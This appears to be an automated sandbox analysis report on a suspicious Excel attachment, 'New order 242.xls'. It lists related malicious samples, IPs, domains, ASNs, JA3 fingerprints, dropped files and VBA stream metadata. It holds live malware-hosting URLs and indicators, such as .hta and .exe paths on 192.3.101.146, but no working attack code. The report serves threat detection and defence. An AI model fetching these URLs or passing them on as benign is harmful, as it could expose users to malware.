                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      192.3.101.146goodmanwnatgoodthingsforbesthings.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                      • 192.3.101.146/545/hscce.exe
                      2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.101.146/xampp/uh/goodmanwnatgoodthingsforbesthings.hta
                      2025-027RC2-ORDEN AVOCOMEX.xlsGet hashmaliciousUnknownBrowse
                      • 192.3.101.146/xampp/uh/goodmanwnatgoodthingsforbesthings.hta
                      3.39.153.44MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                        MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                          #U0437#U0430#U043a#U0430#U0437#U0430_03M4138.docx.docGet hashmaliciousUnknownBrowse
                            #U0437#U0430#U043a#U0430#U0437#U0430_03M4138.docx.docGet hashmaliciousUnknownBrowse
                              Our Order.xlsGet hashmaliciousUnknownBrowse
                                APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                  APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                    APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                      Account statement Payment release.xlsGet hashmaliciousUnknownBrowse
                                        (Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                          13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
                                          • www.mimecast.com/Customers/Support/Contact-support/
                                          http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                                          • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          bg.microsoft.map.fastly.net5rh5u9yBNf.exeGet hashmaliciousGuLoader, HTMLPhisherBrowse
                                          • 199.232.214.172
                                          SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeGet hashmaliciousLummaC StealerBrowse
                                          • 199.232.214.172
                                          Spy-Net.exeGet hashmaliciousSalityBrowse
                                          • 199.232.210.172
                                          #U6d59#U6c5f#U6eab#U5dde#U75c5#U6bd2.exeGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          The Earth.exeGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          USE INCASE OF A SEVERE FORKIE.exeGet hashmaliciousBabadedaBrowse
                                          • 199.232.210.172
                                          theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                          • 199.232.210.172
                                          FNLJD8Q3.exeGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          zsd5jgZ9LU.exeGet hashmaliciousDanaBotBrowse
                                          • 199.232.214.172
                                          s-0005.dual-s-dc-msedge.netPurchase Order dt.17.2025.docxGet hashmaliciousUnknownBrowse
                                          • 52.123.131.14
                                          phish_alert_sp2_2.0.0.0(48).emlGet hashmaliciousUnknownBrowse
                                          • 52.123.130.14
                                          TESTINGPlayback_March 13, 2025 at 093142 PM.docxGet hashmaliciousUnknownBrowse
                                          • 52.123.130.14
                                          _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                          • 52.123.130.14
                                          _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                          • 52.123.130.14
                                          Mandatory Notification Nashintl.msgGet hashmaliciousUnknownBrowse
                                          • 52.123.130.14
                                          Quotation.xlsGet hashmaliciousUnknownBrowse
                                          • 52.123.131.14
                                          #Ud83d#Udcc5 Vos rendez-vous du num#U00e9rique et de la tech pour mars et avril 2025 (116Ko).msgGet hashmaliciousUnknownBrowse
                                          • 52.123.131.14
                                          I_ Order.msgGet hashmaliciousAgentTeslaBrowse
                                          • 52.123.130.14
                                          I_ Order.msgGet hashmaliciousAgentTeslaBrowse
                                          • 52.123.130.14
                                          s-part-0044.t-0009.fb-t-msedge.netzsd5jgZ9LU.exeGet hashmaliciousDanaBotBrowse
                                          • 13.107.253.72
                                          ImageG.exeGet hashmaliciousNovaSentinelBrowse
                                          • 13.107.253.72
                                          MSBuild.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.253.72
                                          NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                                          • 13.107.253.72
                                          SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                                          • 13.107.253.72
                                          https://staemcommunuttly.com/gift/activation=Dor5Fhnm1wGet hashmaliciousUnknownBrowse
                                          • 13.107.253.72
                                          ATT50896.svgGet hashmaliciousHTMLPhisherBrowse
                                          • 13.107.253.72
                                          Quotation.xlsGet hashmaliciousUnknownBrowse
                                          • 13.107.253.72
                                          http://modeltest.newworkventures.org/Get hashmaliciousHTMLPhisherBrowse
                                          • 13.107.253.72
                                          https://modeltest.newworkventures.org/signin-oidcGet hashmaliciousHTMLPhisherBrowse
                                          • 13.107.253.72

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          AS-COLOCROSSINGUSclearpicturewithmebestthingsforgivenmebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                          • 172.245.123.24
                                          needagoodplanforsuccesstogetbackbest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                          • 23.95.235.28
                                          needagoodplanforsuccesstogetbackbest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                          • 23.95.235.28
                                          niceworkingskillgivenmebest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                          • 198.12.89.24
                                          verynicegirlgivenmebestwordforgreatnesswithgoodthings.htaGet hashmaliciousUnknownBrowse
                                          • 192.3.95.138
                                          Build.exeGet hashmaliciousStormKittyBrowse
                                          • 23.94.126.116
                                          h2wb5_002.exeGet hashmaliciousDarkVision RatBrowse
                                          • 104.168.28.10
                                          dBKUxeI.exeGet hashmaliciousAsyncRAT, DarkVision RatBrowse
                                          • 104.168.28.10
                                          random.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, XmrigBrowse
                                          • 107.174.192.179
                                          earereallyniceloverwithgreatthingsonthatkissinggirlonme.htaGet hashmaliciousRemcosBrowse
                                          • 172.245.191.88
                                          MICROSOFT-CORP-MSN-AS-BLOCKUShgfs.ppc.elfGet hashmaliciousUnknownBrowse
                                          • 13.99.168.12
                                          hgfs.arm5.elfGet hashmaliciousUnknownBrowse
                                          • 52.101.21.152
                                          hgfs.mpsl.elfGet hashmaliciousUnknownBrowse
                                          • 13.76.184.174
                                          hgfs.arm.elfGet hashmaliciousUnknownBrowse
                                          • 52.173.237.73
                                          hgfs.mips.elfGet hashmaliciousUnknownBrowse
                                          • 20.168.115.135
                                          Ux0UEsDo6vJYire.exeGet hashmaliciousFormBookBrowse
                                          • 204.79.197.203
                                          fa09d24d7481dbdfc1cff6aaa92d2aec908e037a22a02346f6feeee5d6ba688e.exeGet hashmaliciousSalityBrowse
                                          • 131.253.33.254
                                          custom.exeGet hashmaliciousSalityBrowse
                                          • 204.79.197.203
                                          e9f03b80e02865689b68e810996cea747718f9e4ed21cad621fa7a014cdab7c8.exeGet hashmaliciousSalityBrowse
                                          • 204.79.197.203
                                          hgfs.ppc.elfGet hashmaliciousUnknownBrowse
                                          • 52.155.78.59
                                          AMAZONEXPANSIONGB5rh5u9yBNf.exeGet hashmaliciousGuLoader, HTMLPhisherBrowse
                                          • 3.39.42.215
                                          mKv3sKQ5Q4E7waF.exeGet hashmaliciousFormBookBrowse
                                          • 3.33.130.190
                                          5rh5u9yBNf.exeGet hashmaliciousGuLoader, HTMLPhisherBrowse
                                          • 3.39.42.215
                                          Quotation submitting.exeGet hashmaliciousFormBookBrowse
                                          • 52.223.13.41
                                          hgfs.arm.elfGet hashmaliciousUnknownBrowse
                                          • 160.1.22.174
                                          clearpicturewithmebestthingsforgivenmebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                          • 3.33.130.190
                                          MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                                          • 3.39.153.44
                                          MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                                          • 3.39.89.152
                                          MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                                          • 3.39.153.44
                                          ImageG.exeGet hashmaliciousNovaSentinelBrowse
                                          • 3.33.130.190

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          6271f898ce5be7dd52b0fc260d0662b3windows-7-ultimate-x64-sp1.iso.exeGet hashmaliciousUnknownBrowse
                                          • 3.39.153.44
                                          Andrej Simulator X.exeGet hashmaliciousUnknownBrowse
                                          • 3.39.153.44
                                          test2.exe.bin.exeGet hashmaliciousXWormBrowse
                                          • 3.39.153.44
                                          FleshPowerV2.exeGet hashmaliciousBabadedaBrowse
                                          • 3.39.153.44
                                          FleshPowerV2.exeGet hashmaliciousBabadedaBrowse
                                          • 3.39.153.44
                                          Busy2.0.exeGet hashmaliciousBabadedaBrowse
                                          • 3.39.153.44
                                          MSBuild.exeGet hashmaliciousUnknownBrowse
                                          • 3.39.153.44
                                          Our Order.xlsGet hashmaliciousUnknownBrowse
                                          • 3.39.153.44
                                          Proof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                                          • 3.39.153.44
                                          APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                          • 3.39.153.44
                                          a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.60
                                          SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeGet hashmaliciousLummaC StealerBrowse
                                          • 13.107.246.60
                                          stk.dllGet hashmaliciousUnknownBrowse
                                          • 13.107.246.60
                                          12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.246.60
                                          SystemProcess18.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                          • 13.107.246.60
                                          Setup.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.246.60
                                          Setup.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.246.60
                                          #Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.246.60
                                          2PFebPN0qK.exeGet hashmaliciousLatrodectus, LummaC StealerBrowse
                                          • 13.107.246.60
                                          #Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exeGet hashmaliciousUnknownBrowse
                                          • 13.107.246.60

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):118
                                          Entropy (8bit):3.5700810731231707
                                          Encrypted:false
                                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                          MD5:573220372DA4ED487441611079B623CD
                                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                          C:\Users\user\AppData\Local\Temp\~DF17ADB3F1623D47D7.TMP

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\~DF2C187D1CF638058A.TMP

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\~DFAD383C9BEA430960.TMP

                                          Download File
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 17 03:34:11 2025, Security: 1
                                          Category:dropped
                                          Size (bytes):1172480
                                          Entropy (8bit):7.832914490633643
                                          Encrypted:false
                                          SSDEEP:24576:qLA6DHtWjejsk4McucJIwgxIOXR8YhbBWvdp8tLUWBMDc7jRO:NSaejH4MTczguM8YkpwLUwhX4
                                          MD5:939D20ADA6404EBC7E42EC5F0FCF8859
                                          SHA1:76960884A844CAC3A6CBE48C1257899431DB36FF
                                          SHA-256:21EA14FEF123E9EF3971C078F5C3573B9756B1450E04C26CCDE1AD317A3F590C
                                          SHA-512:2C4CEB82FAA2457B2AE590C38B2875CD210641800562492A3234701547149262BE2DC4786494FA01C314BF5BAFD9F7F48E224526B6627A6E500CA09A28E3A467
                                          Malicious:false
                                          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 17 03:34:11 2025, Security: 1
                                          Entropy (8bit):7.832994944211746
                                          TrID:
                                          • Microsoft Excel sheet (30009/1) 47.99%
                                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                          File name:New order 242.xls
                                          File size:1'172'480 bytes
                                          MD5:1880402f48cccdbfbd8512b6e03ba144
                                          SHA1:7d52fb9c27b199ef4c0ade6dfda7a5bed33d8d49
                                          SHA256:8ffc44346b0715a33f30802fccf6b5d99edcc8323e06b0459fc2366a2c7e249f
                                          SHA512:fd5e4156cac3b2a914aaad968ddf1926f86d3c326641b1ca8d495e4c9f4e4dd77c845371b93764f154d619da8682b2e5f928bf93d820f3dc635eea123121dd3c
                                          SSDEEP:24576:fLA6DHtWjejsk4McuVJIwgxIOXR8YhbBWvdp8tLUWBMDc9jRO:USaejH4MTVzguM8YkpwLUwhl4
                                          TLSH:61450294BFC05626CA1D02340FE78B1C5A25EEEA5755620F3236BE1C3E76B3E0B72519
                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                          File Icon

                                          Icon Hash:35ed8e920e8c81b5

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "New order 242.xls"

                                          Indicators
                                          Has Summary Info:
                                          Application Name:Microsoft Excel
                                          Encrypted Document:True
                                          Contains Word Document Stream:False
                                          Contains Workbook/Book Stream:True
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:False
                                          Flash Objects Count:0
                                          Contains VBA Macros:True
                                          Summary
                                          Code Page:1252
                                          Author:
                                          Last Saved By:
                                          Create Time:2006-09-16 00:00:00
                                          Last Saved Time:2025-03-17 03:34:11
                                          Creating Application:Microsoft Excel
                                          Security:1
                                          Document Summary
                                          Document Code Page:1252
                                          Thumbnail Scaling Desired:False
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:786432
                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                          VBA File Name:Sheet1.cls
                                          Stream Size:977
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' N 6 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 27 4e 36 81 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          VBA Code
                                          Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                          VBA File Name:Sheet2.cls
                                          Stream Size:977
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' N . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 27 4e 82 e4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          VBA Code
                                          Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                          VBA File Name:Sheet3.cls
                                          Stream Size:977
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' N t . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 27 4e 74 fa 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          VBA Code
                                          Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                          General
                                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                          VBA File Name:ThisWorkbook.cls
                                          Stream Size:985
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ' N 8 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 27 4e 38 db 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          VBA Code
                                          Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                          General
                                          Stream Path:\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.25248375192737
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:244
                                          Entropy:2.889430592781307
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                          General
                                          Stream Path:\x5SummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:200
                                          Entropy:3.282068105701866
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . { r . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                          General
                                          Stream Path:MBD00CB8BB9/\x1CompObj
                                          CLSID:
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.25248375192737
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          General
                                          Stream Path:MBD00CB8BB9/\x5DocumentSummaryInformation
                                          CLSID:
                                          File Type:data
                                          Stream Size:296
                                          Entropy:3.2973193143624515
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 1 ! P r i n t _ A r e a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b7 00 00 00 02 00 00 00 e4 04 00 00
                                          General
